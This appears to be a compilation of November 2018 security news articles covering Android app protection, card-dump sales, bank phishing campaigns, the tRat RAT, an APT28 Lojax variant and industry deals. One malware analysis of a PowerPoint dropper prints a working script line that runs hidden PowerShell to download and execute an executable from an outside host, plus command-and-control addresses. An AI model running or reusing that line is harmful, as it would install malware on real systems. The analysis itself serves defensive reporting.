Google Play Protect looks into the APK of all applications it can find, to extract PHA signals such as SMS fraud, phishing, privilege escalation, and the like. Both the resources inside the APK file and the app behavior are tested to produce information about the app's characteristics.
Additionally, Google attempts to understand the manner in which the users perceive apps by collecting feedback (such as the number of installs, ratings, and comments) from Google Play, as well as information about the developer (such as the certificates they use and their history of published apps).
“In general, our data sources yield raw signals, which then need to be transformed into machine learning features for use by our algorithms. Some signals, such as the permissions that an app requests, have a clear semantic meaning and can be directly used. In other cases, we need to engineer our data to make new, more powerful features,” Google notes.
The company calculates a rating per developer based on the ratings of that developer’s apps, and uses that rating to validate future apps. The tech giant also uses embedding to create compact representations for sparse data, and feature selection to streamline data and make it more useful to models.
“By combining our different datasets and investing in feature engineering and feature selection, we improve the quality of the data that can be fed to various types of machine learning models,” the company notes.
Google uses models to identify PHAs in specific categories, such as SMS-fraud or phishing. While these are broad categories, models that focus on smaller scales do exist, targeting groups of apps part of the same PHA campaign and sharing source code and behavior.
Each of these model categories comes with its own perks and caveats. Using a single model to tackle a broad category provides simplicity but lacks precision due to generalization, while the use of multiple PHA models requires additional engineering efforts and reduces scope, despite improving precision.
To modify its machine learning approach, Google uses both supervised and unsupervised techniques, such as logistic regression, which has a simple structure and can be trained quickly, and deep learning, which can capture complicated interactions between features and extract hidden patterns. Google also uses deep neural networks in the process.
“PHAs are constantly evolving, so our models need constant updating and monitoring. In production, models are fed with data from recent apps, which help them stay relevant. However, new abuse techniques and behaviors need to be continuously detected and fed into our machine learning models to be able to catch new PHAs and stay on top of recent trends,” Google notes.
The employed machine learning models were able to successfully detect 60.3% of the PHAs identified by Google Play Protect, covering over 2 billion Android devices, Google says, adding that it will continue investing in the technology.
New set of Pakistani banks’ card dumps goes on sale on the dark web
18.11.2018 securityaffairs CyberCrime
According to the head of the Federal Investigation Agency’s (FIA) cybercrime wing.almost all Pakistani banks were affected by a recent security breach.
Group-IB experts discovered another large set of compromised payment cards details that was put on sale on Joker’s Stash, one of the most popular underground hubs of stolen card data, on Nov. 13. The new set of dumps, unauthorized digital copies of the information contained in magnetic stripe of a bank card, came with the payment details of 177,878 cards from Pakistani and the other international banks.
On November 13, Group-IB Threat Intelligence system detected an abnormal spike in Pakistani banks’ data offered for sale on one of the card shops: a new set of dumps was uploaded to Joker’s Stash. The file was initially put on sale under the name PAKISTAN-WORLD-EU-MIX-03 (fresh skimmeD EU base): PAKISTAN/WORLD/EU TR1+TR2, uploaded 2018.11.13 (NON-REFUNDABLE BASE). Slightly later the name of the database with dumps was changed to «PAKISTAN-WORLD-EU-MIX-03 (fresh skimmeD EU base): PAKISTAN/WORLD/EU TR1+TR2, uploaded 2018.11.13 (time for refunds: 3 hours)».
Presumably, originally, the seller did not want to allow refunding purchased cards, but he later decided to give its potential buyers some time to test the reliability and value of data on sale.
“Card dumps are usually obtained by using skimming devices and through Trojans infecting workstations connected to POS terminals. The large part of compromised card data is sold in specialized card shops, such as Joker’s Stash. Group-IB Threat Intelligence continuously detects and analyses data uploaded to card shops all over the world,” – said Dmitry Shestakov, Head of Group-IB сybercrime research unit.
According to Group-IB’s annual Hi-Tech Crime Trends 2018 report, on average, from June 2017 to August 2018, 1.8 million were uploaded to card shops monthly. Group-IB’s records indicate that card dumps account for 62% of total sets of card data sold, which means that POS Trojans represent the major method of compromising credit cards and might have caused this particular leak.
The total amount of dumps that went on sale on Nov. 13 was amounted to 177,878: there were 150,632dumps of Pakistani banks, 16,227 cards of other regions’ banks and 11,019 dumps of undefined banks.
The banks affected by this breach included major Pakistani financial organizations such as, Habib Bank, MCB Bank Limited, Allied Bank Limited and many others. Habib Bank was affected most by the breach: roughly 20% of cards (30,034) in the uploaded database was issued by this bank. It is also worth noting, that there were no card dumps of BankIslami up for sale this time.
“What is interesting about this particular leak is that the database that went on sale hadn’t been announced prior either in the news, on card shop or even on forums on the dark net – comments Dmitry Shestakov. The market value of this database is estimated at $19.9 million. The sale price for these card dumps ranges from $17 to $160. However, it is very rare, that Pakistani banks’ cards come on sale on the dark net card shops. In the past six months it was the only big sale of Pakistani banks’ data.”
Prior to this data leak, Group-IB experts detected two consecutive Pakistani banks’ compromised cards uploads to Joker’s Stash. The first one occurred on Oct. 26, when new dump identified as “PAKISTAN-WORLD-EU-MIX-01” went on sale on Joker’s Stash card shop. This dump database had 10,467 payment cards details, 8,704 of which belonged to Pakistani banks, including BankIslami. The breach might have caused the compromise of BankIslami account holders that took place on Oct. 27. The set of dumps was valued at $1.1 million with sale price ranging from $35 to $150. Another set under the name «PAKISTAN-WORLD-EU-MIX-02 (fresh skimmeD EU base) : PAKISTAN/WORLD/EU TR1+TR2» was published on Joker’s Stash on Oct. 31. This time, the database had data on 11,795 cards issued by the leading Pakistani and other regions’ banks: 710 dumps from undefined banks and 1,031 dumps from the banks outside of Pakistan. No BankIslami cards dumps were published in the set.
Japanese government’s cybersecurity strategy chief has never used a computer
18.11.2018 securityaffairs BigBrothers
The Japanese government’s cybersecurity strategy chief Yoshitaka Sakurada is in the middle of a heated debate due to his admission about his cyber capability.
Yoshitaka Sakurada admitting he has never used a computer in his professional life, despite the Japanese Government, assigned to the politician the responsibility for cybersecurity of the 2020 Tokyo Olympics.
Sakurada was only appointed as cyber minister in October after Japanese Prime Minister Shinzo Abe was re-elected as head of the Liberal Democratic Party.
When the independent lawmaker Masato Imai in a lower house session questioned Sakurada about its cyber capabilities, the Japanese politician confirmed that he never user a computer since he was 25 years old.
“Since I was 25 years old and independent I have instructed my staff and secretaries. I have never used a computer.” said Yoshitaka Sakurada.
Of course, the response shocked the audience, including Imai.
“I find it unbelievable that someone who is responsible for cybersecurity measures has never used a computer.” said Imai.
“It’s a matter that should be dealt with by the government as a whole. I am confident that I am not at fault.” replied Sakurada.
This isn’t the first time Sakurada was in the middle of a controversy, in 2016 he was admonished for saying that women forced into wartime Japanese military brothels were “prostitutes by occupation.”
At the time, South Korean Government rebuked the Japanese Government and Sakurada was obliged to retract the remarks. Into wartime, many Koreans women were forced into sexual slavery by Japan’s Imperial Army.
Using Microsoft Powerpoint as Malware Dropper
18.11.2018 securityaffairs Virus
Marco Ramilli, founder and CEO at cyber security firm Yoroi has explained how to use Microsoft Powerpoint as Malware Dropper
Nowadays Microsoft office documents are often used to propagate Malware acting like dynamic droppers. Microsoft Excel embedding macros or Microsoft Word with user actions (like links or external OLE objects) are the main players in this “Office Dropping Arena”. When I figured out that a Microsoft Powerpoint was used to drop and to execute a Malicious payload I was amazed, it’s not so common (at least on my personal experiences), so I decided to write a little bit about it.
The “attack-path” is very close to what it’s observable on modern threats since years: eMail campaign with an attached document and actionable text on it. In the beginning, the Microsoft Powerpoint presentation looked like a white blank page but performing a very interesting and hidden connection to hxxps://a.doko.moe/wraeop.sct.
Analyzing the Microsoft Powerpoint structure it rises on my eyes the following slide structure
Stage 1: Microsoft PowerPoint Dropping Website
An external OLEobject (compatibility 2006) was available on that value:
Decoding that string from HEX to ASCII is much more readable:
Decoding the 3.6K script appears clear that one more Stage is involved in the infection process. The following code is the execution path that drives Stage 2 to Stage 3.
var run = new ActiveXObject(‘WSCRIPT.Shell’).Run(powershell -nologo -executionpolicy bypass -noninteractive -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile(‘http://batteryenhancer.com/oldsite/Videos/js/DAZZI.exe’, ‘%temp%/VRE1wEh9j0mvUATIN3AqW1HSNnyir8id.exe’); Start-Process ‘%temp%/VRE1wEh9j0mvUATIN3AqW1HSNnyir8id.exe’ );
The script downloads a file named: AZZI.exe and saves it by a new name: VRE1wEh9j0mvUATIN3AqW1HSNnyir8id.exe on a System temporary directory for running it. The downloaded PE Executable is a .NET file created by ExtendedScript Toolkit (according to compilation time) on 2018-11-13 15:21:54 and submitted a few hours later on VirusTotal.
Stage 3: .NET file
The Third stage uses an internal resource (which happens to be an image) to read and execute additional code: the final payload or Stage 4. In other words Stage 3 reads an image placed under the internal resource of PE File, extracts and executes it. The final payload looks like AzoRult Malware. The evidence comes from traffic analysis where the identified pattern sends (HTTP POST) data on browser history and specifically crafted files under User – AppData to specific PHP pages. Moreover, the Command and control admin panel (hxxps://ominigrind.ml/azzi/panel/admin.php) looks like AZOrultV3.
Stage4: AZORult evidence
I hope you had fun on this, I did! It was super interesting to see the attacker’s creativity and the way the act to include malicious contents into Office Documents. Microsoft should probably take care of this and try to filter or to ask permissions before include external contents, but still, this will not be a complete solution (on my personal point of view). A more deep and invasive action would be needed to check the remote content. Stay tuned!
Indicators of Compromise (IoCs) for the malicious code are reported in the original analysis published by Marco Ramilli in his blog.
Group-IB presented latest cybercrime and nation-state hacking trends in Asia
17.11.2018 securityaffairs CyberCrime
According to Group-IB’s report findings, Asia is one of the most actively attacked regions in the world, the company presented latest cybercrime trends.
Hong Kong, 16.11.2018 – Group-IB, an international company that specializes in preventing cyber attacks, presented the findings of its latest Hi-Tech Crime Trends 2018 report at the FinTech Security Conference in Hong Kong organized by Binary Solutions Limited in partnership with Group-IB.
According to Group-IB’s report findings, Asia is one of the most actively attacked regions in the world. Over the past year, 21 state-sponsored groups were detected in the area, which is more than in Europe and the US combined. Hong Kong, Singapore, Seoul, and Shanghai, and many other financial powerhouses in Asia are likely to become primary targets of financially motivated hacker groups in the near future.
“Cyber trends and threats that we identified in the world are likely to occur in Asia. Asia’s rapid economic growth has ramped up the interest of financially motivated hackers and state-sponsored hacker groups. Local banks have already been attacked by advanced hacker groups several times; we expect this trend to increase,” – comments Dmitry Volkov, Group-IB CTO.
Since the beginning of 2018, Group-IB experts detected that cybercriminals were seeking to get access to the user databases of Hong Kong state Internet portals responsible for taxes, trade, procurement, logistics, innovations and hi-tech infrastructure.
Espionage as one of the main APT groups’ goals
The threat landscape for critical infrastructures is growing more complex, provoked by the activity of state-sponsored threat actors, who are seeking to establish a sustained presence within critical infrastructure networks for long-term espionage or sabotage. These groups target companies in energy, financial, aviation, water sectors etc. Banks are considered to be an integral part of critical infrastructure. Which is why the availability of tools and experience in disrupting bank systems are now priorities for attackers. Such tools are actively used by two groups in particular: BlackEnergy and Lazarus.
To infiltrate critical infrastructure networks hackers will continue to use phishing as one of their main tools, but the focus of attacks might shift to vulnerable network equipment connecting the network to the Internet. APT groups will keep investing heavily in the development and acquisition of zero-day exploits, according to Group-IB’s forecasts. Another trend Group-IB experts identified is networks compromise through key personnel’s home networks and personal devices. Increasingly often, state-sponsored hackers are focusing on vulnerabilities in home routers. This allows them to not only spy on users without infecting their devices, but also maintain a more extensive and dynamic infrastructure and remain unnoticed.
Group-IB’s new report features the activity of roughly 40 state-sponsored groups around the world, 21 one of which were most active in Asia-Pacific, including the Infamous North-Korean Lazarus group. For some of the hacker groups detected, the country of origin is yet to be established. The attribution is sometimes complicated by the fact that some groups may imitate other groups’ unique features to throw researchers off track.
Attacks on Crypto
In 2017-2018 hackers’ interest in cryptocurrency exchanges ramped up. Thirteen exchanges were hacked in 2017 and in the first three quarters of 2018, amounting to a total loss of $877 million. Thus, 60% of the total amount was stolen from Coincheck, a Japanese cryptocurrency exchange. Silence, MoneyTaker and Cobalt are likely to conduct new attacks on crypto exchanges.
A relatively new method of fraud on the ICO market was stealing a White Paper of ICO project and presenting an identical idea under a new brand name. Spear phishing remains the major vector of attack: approximately 56% of all money siphoned off from ICO were stolen using phishing.
In 2018 Group-IB detected five successful “51% attacks”, when attackers take control over at least 51% of mining power. Having 51% of computing power, the attackers create a stealthy alternative blockchain to confirm their own transactions. In 2018 the direct financial losses from these attacks amounted to almost $20 million.
Attacks on banks and their clients
Advanced hacker groups that Group-IB identifies as most dangerous to banking sector all over the world are Lazarus, MoneyTaker, Cobalt and Silence. The three latter are led by Russian-speaking hackers. All these groups are able to not only penetrate a bank’s network and access isolated financial systems, but also withdraw money via SWIFT, card processing systems, and ATMs. The Lazarus group will continue to attack banks and steal funds via SWIFT. They will likely experiment with attacks on card processing, primarily focusing on Asia and the Pacific. New cybercrime groups are also expected to start operations in Asia and Latin America.
The number of attacks via SWIFT increased dramatically over the reviewed period. In the previous period, three such attacks were tracked – in Hong Kong, Ukraine, and Turkey. In this period, however, 9 successful attacks have already taken place in Nepal, Taiwan, Russia, Mexico, India, Bulgaria, and Chile. Only two hacker groups target the SWIFT interbank transfer system: Lazarus and Cobalt. The average volume of theft attempt via SWIFT is estimated at $26 million.
Group-IB marked six new PC Trojans that appeared internationally: IcedID, BackSwap, DanaBot, MnuBot, Osiris и Xbot. Web phishing, which is another popular attack vector, has grown globally. The financial phishing is, predictably, mainly targeting US-based companies. The corresponding share of financial phishing webpages is 26%. France and Germany are second and third, respectively, in this ranking. Among all phishing resources, 73% can be divided into the following categories: cloud storages (28%), financial platforms (26%), and online services (19%).
During the last year, Group-IB Threat Intelligence detected 27 million cards uploaded to card shops. The company’s records indicate that dumps account for 62% of data sold, which means that POS Trojans are the main method of compromising plastic cards. Unlike dumps, text data is sold much cheaper in card shops: its total value amounted to $95.6 million, accounting for only 17% of the overall market value, compared to 19.9 million dumps, which cost as much as $567.8 million.
Group-IB in Asia
Group-IB is not a stranger to the region. It has recently announced the opening of the Global HQ in Singapore by the end of 2018, where Group-IB will manage and keep developing its global threat-hunting infrastructure aimed at adversary-centric detection and proactive threat hunting. Group-IB’s portfolio of clients in Asia includes banks, financial and government organizations in Singapore, Thailand and other countries. Southeast Asia accounts for more than 30% of the company’s international revenue.
Two hacker groups attacked Russian banks posing as the Central Bank of Russia
17.11.2018 securityaffairs CyberCrime
Group-IB has detected massive campaigns targeting Russian financial institutions posing as the Central Bank of Russia.
The emails were disguised to look as if they come from the Central Bank of Russia and FinCERT, the Financial Sector Computer Emergency Response Team. Group-IB experts have discovered that the attack on 15 November could have been carried out by the hacker group Silence, and the one on 23 October by MoneyTaker. Group-IB considers both cybercriminal groups among the most dangerous to Russian and international financial organisations.
November attack: Silence
In the morning of 15 November, Group-IB detected a malicious mass email campaign sent to Russian banks from a fake email address purporting to belong to the Central Bank of Russia (CBR). Of course, the CBR does not have anything to do with the phishing campaign – the hackers faked the sender’s address. SSL certificates were not used for DKIM verification. Emails with the subject line “Information from the Central Bank of the Russian Federation” asked recipients to review the regulator’s decision “On the standardisation of the format of CBR’s electronic communications” and to immediately implement the changes. The documents in question were supposedly contained in the zipped files attached, however by uncompressing these files users downloaded Silence.Downloader – the tool used by Silence hackers.
Group-IB experts have observed that the style and format of the emails were almost identical to official correspondence from the regulator. The hackers most likely had access to samples of legitimate emails. According to Group-IB’s report published in September 2018, Silence gang members presumably were or are legally employed as pentesters and reverse engineers. As such, they are very familiar with documentation in the financial sector and the structure of banking systems.
October attack: MoneyTaker
The message sent on 23 October, also from a fake FinCERT email address, contained five attachments disguised to look like official CBR documents. Among them was a document entitled “Template Agreement on Cooperation with the Central Bank of the Russian Federation on Monitoring and Information Exchange .doc”. Three out of five files were empty decoy documents, but two contained a download for the Meterpreter Stager. To carry out the attack, hackers used self-signed SSL certificates. Furthermore, the server infrastructure involved had been used in the previous attacks conducted by MoneyTaker. All these factors led to the conclusion that MoneyTaker was behind the October attack.
Group-IB experts believe that hackers managed to obtain the samples of CBR documents from earlier compromised mailboxes belonging to employees of Russian banks. MoneyTaker used the information obtained to design emails and documents purporting to be from the CBR to conduct targeted attacks on banks.
A spear-phishing campaign set up to look like it was carried out by the Central Bank is a relatively widespread vector of attack among cyber criminals; it has been used by groups such as Buhtrap, Anunak, Cobalt, and Lurk. In March 2016, for example, cybercriminals sent phishing emails from firstname.lastname@example.org. As regards to genuine notifications from the Central Bank of Russia, in the past hackers from Lurk and Buhtrap used them to send malware to bank employees.
“Since July, to share information, FinCERT has been using an automated incident processing system that makes it possible to securely and quickly share information about incidents and unauthorized operations based on the “Feed-Antifraud” database,” comments the Central Bank’s press service. “The backup channel for sharing information is email. All messages sent via email contain FinCERT’s electronic signature.”
Information and indicators of attack (IoAs) from 23 October and 15 November attacks were quickly uploaded to Group-IB Threat Intelligence, which allowed to warn Group-IB clients among Russian banks about the potential threat. Group-IB TDS (Threat Detection System) detected both phishing campaigns and signaled about the malicious activity. Group-IB system blocked this threat in inline mode.
“MoneyTaker and Silence are two of the four most dangerous hacker groups that present a real threat to international financial organisations,” said Rustam Mirkasymov, Group-IB Head of Dynamic Analysis of malware department and threat intelligence expert. “Hackers from MoneyTaker use all possible attack vectors when targeting banks. For example, they can send spear-phishing emails, carry out a drive-by attack, or test a bank’s network infrastructure for existing vulnerabilities. After gaining access to the network’s internal nodes, hackers are easily able to carry out attacks and withdraw money through ATMs, card processing or interbank transfers systems (in Russia, AWS CBR (the Russian Central Bank’s Automated Workstation Client). Silence, for their part, are less resourceful and use only a tried and tested attack method – phishing emails. Unlike their colleagues, however, they pay closer attention to the content and design of their phishing emails.”
Silence is an active though very small group of Russian-speaking hackers. Group-IB first detected the group’s activity in 2016. Over the course of their ‘work’, Silence attacked bank management systems, card processing systems, and the Russian interbank transfers system (AWS CBR). The gang’s targets are mainly located in Russia, Ukraine, Belarus, Azerbaijan, Poland, and Kazakhstan, although phishing emails were sent to bank employees in Central and Western Europe, Africa, and Asia. A month ago, Group-IB detected a spear-phishing attack targeting the companies in the United Kingdom. The report “Silence: Moving into the darkside” was published in September 2018 and was the first to describe the group’s tactics and tools.
MoneyTaker is a hacker group that is thought to be responsible for 16 attacks in the United States, 5 attacks on Russian banks, and 1 in the United Kingdom. Apart from money, the criminals steal documentation about interbank payment systems that is necessary for preparing future attacks. The group also carries out attacks through intermediaries by hacking banks’ partners, IT companies, and financial product providers. In December 2017, Group-IB published its first report on the group:“MoneyTaker: 1.5 years of silent operations”.
tRat is a new modular RAT used by the threat actor TA505
17.11.2018 securityaffairs Virus
The threat actor TA505 behind many Dridex and Locky campaigns have been using a new Remote Access Trojan (RAT) dubbed tRat.
Researchers at Proofpoint warns that the threat actor TA505 have been using a new Remote Access Trojan (RAT) dubbed tRat that implements a modular structure that was written in Delphi.
The TA505 operates on a large scale, it was behind other major campaigns leveraging the Necurs botnet to deliver other malware, including the Locky ransomware, the Jaff ransomware, and the Dridex banking Trojan.
The new strain of malware was first discovered at the end of September when it was distributed through weaponized Word documents that download the RAT.
Attackers used documents that abused the Norton brand, subject lines on the messages reinforced the social engineering, stating “I have securely shared file(s) with you.”
At the time of the discovery, the experts did not attribute it to a specific threat actor, but in October researchers found evidence of use made by TA505.
“More recently, the group has been distributing a variety of remote access Trojans (RATs), among other information gathering, loading, and reconnaissance tools, including a previously undescribed malware we have dubbed tRat.” reads the analysis published by Proofpoint.
“tRat is a modular RAT written in Delphi and has appeared in campaigns in September and October of this year (one of them by TA505). “
Researchers noticed it was involved in a spam campaign on October 11, attackers used both Microsoft Word and Microsoft Publisher files for spread the malicious code.
Hackers used the tRat malware to target users at commercial banking institutions.
The RAT gain persistence by copying the binary to a directory in the AppData folder, then it creates an LNK file in the Startup directory to make the binary get executed everytime the system restarts.
The tRat malware connects to the C2 through the TCP port 80, the connection is encrypted and data is transmitted in hex-encoded.
Once infected the system, the RAT sends to C2 the system information including computer name, system username, and tRat bot ID.
tRat could receive a module by performing the following sequence of actions:
If “[WAIT_FOR_AUTH_INF]” is received, send AUTH_INF data
If “[WAIT_FOR_MODULE_NAME]” is received, send module name
The response could be one of the following:
If module length is received, send a “[READY]”
The module itself is encrypted similarly to the C&C communications, but appears to use different keys that are sent with the module
Once decrypted, the modules are loaded as a DLL and executed using the received export name
At the time of writing, the researchers have not yet observed any modules delivered by a C2.
“TA505, because of the volume, frequency, and sophistication of their campaigns, tends to move the needle on the email threat landscape.”
“However, we observe these new strains carefully as they have also adopted new malware like Locky or less widely distributed malware like FlawedAmmyy at scale following similar tests. Moreover, their adoption of RATs this year mirrors a broader shift towards loaders, stealers, and other malware designed to reside on devices and provide long-term returns on investment to threat actors,” Proofpoint concludes.
Additional details such as IoCs are included in the report published by Proofpoint.
Cybaze ZLab- Yoroi team spotted a new variant of the APT28 Lojax rootkit
17.11.2018 securityaffairs APT
Malware researchers at the Cybaze ZLab- Yoroi team spotted a new variant of the dangerous APT28 Lojax rootkit.
A new variant of the infamous APT28 Lojax (aka Double-Agent) has been discovered by the Cybaze ZLab – Yoroi team. It is the latest version of the well-known rootkit Double-Agent, previously analyzed by ESET researchers.
The behavior of the Lojax sample seems to be similar to the previous versions and exploits the legitimate “Absolute Lojack” software to grant its persistence on the infected system. Lojack is an anti-theft and localization software developed by Absolute Software Corporation and it is pre-installed in the BIOS image of several Lenovo, HP, Dell, Fujitsu, Panasonic, Toshiba, and Asus machines. In the past, this software was known as “Computrace”.
Despite its legitimate purposes, the Absolute Lojack software acts like a rootkit (more precisely as a bootkit): its BIOS component forces the writing of a small agent named “rpcnetp.exe” into the system folder. The agent periodically contacts the Absolute server and sends to it the current machine’s position.
The control flow of the Lojack software is detailed in the following figure:
Figure 1. Lojack control flow (Source:ESET)
The size of the malicious artifact is the same as the legitimate one, so the only manipulation seems to the modification of the C2C address, in according with other firms that previously analyzed the malware.
Hash Sha256: 6d626c7f661b8cc477569e8e89bfe578770fca332beefea1ee49c20def97226e
Digital Signature –
First Submission 2018-11-05
Icon APT28 Lojax ico 2
Notes Lojack Double-Agent
File size: 17 KB
When it starts, the malware copies itself into a new DLL: the final file is the same of the initial one except for some header flags. After this, Lojax searches some components belonging to the legitimate software that should be already installed into the machine, with whom tries to establish a connection via RPC channel. If the Absolute Lojack components are not found, the malware kills itself.
Hash Sha256: aa5b25c969234e5c9a8e3aa7aefb9444f2cc95247b5b52ef83bf4a68032980ae
Digital Signature –
First Submission 2018-11-05
Icon APT28 Lojax ico 2
File size: 17 KB
Through a static analysis of the sample, we have discovered a new C2 address, unknown to the community and to the threat intelligence platforms until now. This address, ciphered using XOR encryption with a single byte key 0xB5, was hidden in the section “.cdata”.
After the decryption of the address, the result is “regvirt.com”, as shown in the below figure:
The domain has been registered on 10th Oct 2017 by “Tibor Kovacs” (email@example.com) and it’s handled by the “Shinjiru Technology Sdn Bhd” provider. The username part of the mailbox contains the same name and surname found in the Registrant name, with the addition of a terminal “r” tiborkovacsr, its not clear if this letter could be a clue usable to focus the investigation to an hypothetical profile of the registrant.
Registrant Name: Tibor Kovacs
Registrant Street: Vezer u 43
Registrant City: Budapest
Registrant State/Province: Budapest
Registrant Postal Code: 1141
Registrant Country: HU
Registrant Phone: +36.361578632154
Registrant Phone Ext:
Registrant Fax Ext:
Registrant Email: firstname.lastname@example.org
The domain hosts have inactive subdomains, such as mail.regvirt.com pointing to the localhost address 127.0.0.1. Also, it has resolved to a different IP address 188.8.131.52 during the 16th Oct 16 07th Nov time period, this address is related the Confluence Network ISP: that IP has been blacklisted for a limited time by abuse.ch, between 2017-09-18 and 2017-10-19, and have been reported as malicious by the abuseipdb on December 2017. Other malicious activities related to the cybercrime threat actors have been reported through the ransomware tracker platform, where the IP is associated with several Locky ransomware distribution domains back in 2016. However, all the possible reported misuse of the ip address does not apparently match the regvirt.com’s resolution time period.
The 184.108.40.206 ip address, instead, has been resolved since the first registration of the “regvirt.com” domain back in 2017. This network destination has been reported as command and control server of altered CompuTrace/Lojack’s software, part of the APT28 arsenal. The report published by the UK’s National Cyber Security Centre on October 2018 states this implant have been used to modify system memory and maintain persistence on compromised hosts in the long run.
Domain Time-period between
2017-10-17 and 2018-11-13 Time-period between
2018-10-16 and 2018-11-07
DEDICATED-SERVERS NL(Eureka Solutions Sp. z o.o. PL)regvirt.com MX
TX1-CONFLUENCE-4 AE(Confluence Networks Inc.)
www.regvirt.com www.regvirt.com CNAME regvirt.com
mail.regvirt.com mail.regvirt.com A 127.0.0.1
Despite the presence of the UEFI “Secure Boot”, this malware could execute itself because it replaces only the “rpcnetp.exe” component. Anyhow, the MalwareLab researchers advise to keep enabled the UEFI Secure Boot and keep always updated the Operative System and the anti-malware solution.
Indicator of Compromise
YARA Rules and additional technical details are available on the Yoroi blog.
BlackBerry to Acquire Cylance for $1.4 Billion in Cash
16.11.2018 securityweek IT
BlackBerry on Friday announced that it has agreed to acquire next-generation endpoint security firm Cylance for US $1.4 billion in cash.
In addition to the cash payment, BlackBerry will assume unvested Cylance employee incentive awards.
The deal is expected to close before the end of BlackBerry’s current fiscal year (February 2019), and Cylance will operate as a separate business unit within BlackBerry.
Cylance, which has raised nearly $300 million in funding, currently has more than 4,000 customers, including more than 20% of the Fortune 500. The company previously said that it had annual revenues over $130 million for fiscal year 2018, and over 90% year-over-year growth.
Cylance’s flagship endpoint security product, CylancePROTECT, takes a mathematical and machine learning approach to identifying and containing zero day and advanced attacks. The company has been utilizing artificial intelligence and machine learning as part of its core marketing message since the company was founded in 2012.
“We plan on immediately expanding the capabilities across BlackBerry’s ‘chip-to-edge’ portfolio, including QNX, our safety-certified embedded OS that is deployed in more than 120 million vehicles, robot dogs, medical devices, and more,” a BlackBerry company spokesperson told SecurityWeek. “Over time, we plan to integrate Cylance technology with our Spark platform, which is at the center of our strategy to ensure data flowing between endpoints (in a car, business, or smart city) is secured, private, and trusted.”
BlackBerry describes Spark as a secure chip-to-edge communications platform “designed for ultra-security and industry-specific safety-certifications, such as ISO 26262 in automobiles.”
In early 2018, BlackBerry launched Jarvis, a cybersecurity service designed to help companies in the automotive and other sectors find vulnerabilities in their software.
BlackBerry also offers VPN and identity and access solutions to help enterprises securely connect employees and help them access the corporate information and systems.
The acquisition of Cylance is not BlackBerry’s first in the security space—but is its largest acquisition to-date.
In April 2015, BlackBerry announced that it would acquire WatchDox, a Palo Alto, Calif.-based provider of enterprise solutions to access, share and protect sensitive documents.
In September 2015 BlackBerry agreed to acquire secure mobility solutions provider Good Technology for $425 million in cash.
Shares of BlackBerry Ltd (NYSE: BB) are trading down 1.24% in pre-market trading at the time of publishing, at $8.75 per share.
Data Protection Firm Cognigo Raises $8.5 Million
16.11.2018 securityweek IT
Cognigo, a Tel Aviv, Israel-based startup focused on data protection and compliance, this week announced that it has completed an $8.5 million Series A round of funding.
The company’s flagship “DataSense” offering is an artificial intelligence (AI) driven platform that can provide GDPR compliance and data protection by automatically recognizing and categorizing structured and unstructured data across file repositories, databases and cloud services.
“By creating a powerful, centralized index, and leveraging a native ‘Google-like’ search engine, DataSense provides answers to your most critical data security and business-related questions. Discover data violations, potential breaches and compliance issues with a single pane of glass,” Cognigo explains on its website.
According to the company, the new funding will be used to support global sales and marketing and product development efforts.
The Series A round was led by OurCrowd, with Prosegur, and State of Mind Ventures.
Dridex/Locky Operators Unleash New Malware in Recent Attack
16.11.2018 securityweek Virus
The threat actor(s) behind many Dridex and Locky campaigns have been using a new Remote Access Trojan (RAT), Proofpoint security researchers warn.
Known as TA505, the attackers have been using malware dubbed tRat, which was written in Delphi and is modular in nature. The new piece of malware was first spotted at the end of September, when it was being spread by an unattributed actor. Malicious Word documents used in the attack used macros to download the RAT.
The malware was picked up by TA505 last month and used in an attack on October 11, as part of an email campaign that used both Microsoft Word and Microsoft Publisher files for distribution purposes. The attack targeted users at commercial banking institutions.
tRat, the security researchers say, achieves persistence by copying the binary to a directory in the AppData folder. Next, it creates a LNK file in the Startup directory to ensure the binary is executed when the system starts.
The malware uses TCP port 80 for command and control (C&C) communications, encrypting data and transmitting it hex-encoded. The initial network request sent to the server includes system information such as computer name, system username, and tRat bot ID.
“Currently, we believe that the only supported command in the loader is "MODULE," which contains at least a module name and export name,” the security researchers reveal.
TA505 has historically engaged into high-volume, high-frequency, sophisticated campaigns, and has been known to test new malware including BackNet, Cobalt Strike, Marap, Dreamsmasher, and even the Bart ransomware, though they never returned to distributing any of these.
“However, we observe these new strains carefully as they have also adopted new malware like Locky or less widely distributed malware like FlawedAmmyy at scale following similar tests. Moreover, their adoption of RATs this year mirrors a broader shift towards loaders, stealers, and other malware designed to reside on devices and provide long-term returns on investment to threat actors,” Proofpoint concludes.
Trend Micro, Moxa Form New IIoT Security Company
16.11.2018 securityweek IT
Cybersecurity firm Trend Micro and industrial networking solutions provider Moxa on Thursday announced plans to form a joint venture corporation focusing on securing industrial internet of things (IIoT) environments.
The new company, TXOne Networks, will offer security gateways, endpoint agents and network segmentation solutions designed to help organizations secure, control and monitor equipment and operational technology (OT).
Each company will provide funds, intellectual capital and staff, with Trend Micro bringing cybersecurity expertise and Moxa contributing over 30 years of industrial networking and protocol expertise.
TXOne Networks aims to help secure smart manufacturing, smart city, smart energy and other IIoT environments. Trend Micro and Moxa noted that securing these types of environments is challenging considering that they require multiple layers of protection in both IT and OT networks and between them.
The new company will also offer professional services, including risk assessment, breach response, and threat intelligence from Trend Micro and the Zero Day Initiative (ZDI).
Learn More About IIoT Security at SecurityWeek’s ICS Cyber Security Conference
Trend Micro will be a majority owner in the joint venture, which will be led by Trend Micro Vice President Dr. Terence Liu.
“With this joint venture, Moxa and Trend Micro will position TXOne Networks as a global leader in the industry to create effective IIoT security solutions that help ensure IIoT applications and critical infrastructures are secure,” said Andy Cheng, Strategic Business Unit President for Moxa. “We are excited about the partnership, and industrial automation customers around the globe will be able to reap the benefits of having a holistic OT/IT security solution to protect assets and reduce operational risk.”
Firefox Alerts Users When Visiting Breached Sites
16.11.2018 securityweek Security
Mozilla has added a new feature to Firefox to alert users when they visit a website that has been part of a data breach in the past.
Earlier this year, the Internet organization launched Firefox Monitor, a service to inform users if their accounts have been part of data breaches. Enjoying support for Cloudflare, the service uses data from Troy Hunt’s Have I Been Pwned (HIBP) website to keep track of compromised accounts.
The newly announced Firefox alert is the latest improvement Mozilla brings to Firefox Monitor and takes advantage of the very same HIBP data to warn users of breached websites.
“To help users who might have otherwise missed breach news or email alerts, we are integrating alerts into Firefox that will notify users when they visit a site that has been breached in the past. This feature integrates notifications into the user’s browsing experience,” Mozilla’s Luke Crouch explains.
What users should keep in mind when receiving these alerts, however, is the fact that neither HIBP nor Mozilla know if they changed their passwords after a breach or if they reused the same passwords on another account.
